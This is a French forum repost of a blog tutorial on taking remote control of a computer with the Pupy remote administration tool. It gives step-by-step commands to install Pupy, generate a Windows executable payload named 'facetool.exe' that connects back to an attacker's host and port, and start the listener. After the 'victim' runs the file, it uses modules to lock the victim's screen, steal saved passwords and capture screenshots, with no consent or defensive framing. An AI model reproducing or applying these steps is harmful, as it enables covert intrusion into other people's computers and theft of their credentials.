Aller au contenu

Prenez le contrôle d'un ordinateur à distance avec Pupy – Homputer Security


Ldfa

Messages recommandés

Comment prendre le controle d'un ordinateur à distance avec Pupy ?
Pupy est outil RAT (Remote Administration Tool) en d’autres termes, un outil capable de contrôler à distance un ordinateur. C’est un outil Open Source, multi plate-forme, et également doté d’un interpréteur écrit en Python.
Il offre la possibilité d’exécuter des modules uniquement dans la mémoire laissant ainsi très peu de traces sur la machine victime.
Pupy peut également générer des payloads dans plusieurs types de format de fichier comme des exécutables, des fichiers dll, les apk, etc.
Dans ce billet, nous verrons comment l’installer, puis l’utiliser sous Kali.

Installez Pupy en suivant ces étapes :

git clone https://github.com/n1nj4sec/pupy.git
cd pupy
git submodule init
git submodule update
pip install -r requirements.txt

Commençons par créer un fichier malicieux à l’aide du générateur de payload pupygen.py.
Voici les options disponibles du script :

Options de pupygen.py

Créons un payload destiné à la plate-forme Windows 64-bit à l’aide des options suivantes :

./pupygen.py -f exe_x64 -o facetool.exe connect –host 192.168.1.16:8888

Creation d'un payload à l'aide de pupygen.py

-f exe_x64 représente le format de fichier,
-o facetool.exe l’output qui comprend le nom du fichier (facetool) et l’extension (exe),
–host 192.168.1.16:8888 l’adresse hôte suivi du port. Si vous ne changez pas de port, le script choisira le port 443 (HTTPS), le port par défaut.

Le payload ainsi généré est stocké dans le dossier pupy/pupy.

Le payload

La prochaine étape consiste à changer le port entrant dans le fichier de configuration de Pupy pupy.config.default.

Configuration du port d'entrée dans pupy.config.default

Avant de lancer Pupy, il faudra démarrer le service Postgresql

service postgresql start

Puis, lancez Pupy à l’aide du script ./pupysh.py.
La victime, ayant cliqué sur le malware, une session s’est ouverte automatiquement dans notre shell Pupy.
Pour voir les options disponibles dans le shell, saisissez help.

Options dans la session ouverte de Pupy

Listez tous les modules disponibles à l’aide de list_modules.

Liste des modules disponibles dans la session Pupy

Muni de ces modules, vous pourriez réaliser plusieurs choses intéressantes.
Par exemple, le module manage/lock_screen vérrouille instantannément l’écran de la victime.

pupy7.png?resize=665%2C36

Verrouillage de l'écran de la victime

Le module creds/lazagne conçu à partir de Lazagne récupère les mots de passe de la victime.

Tentative de récupération des mots de passe de la victime

Le module gather/screenshot réalise une capture de l’écran de la victime.

pupy11.png?resize=665%2C49

Capture d'écran de la victime

Happy Hacking !

mdestroy

Afficher l’article complet

Lien vers le commentaire
Partager sur d’autres sites

Archivé

Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.

×
×
  • Créer...

Information importante

Nous avons placé des cookies sur votre appareil pour aider à améliorer ce site. Vous pouvez choisir d’ajuster vos paramètres de cookie, sinon nous supposerons que vous êtes d’accord pour continuer.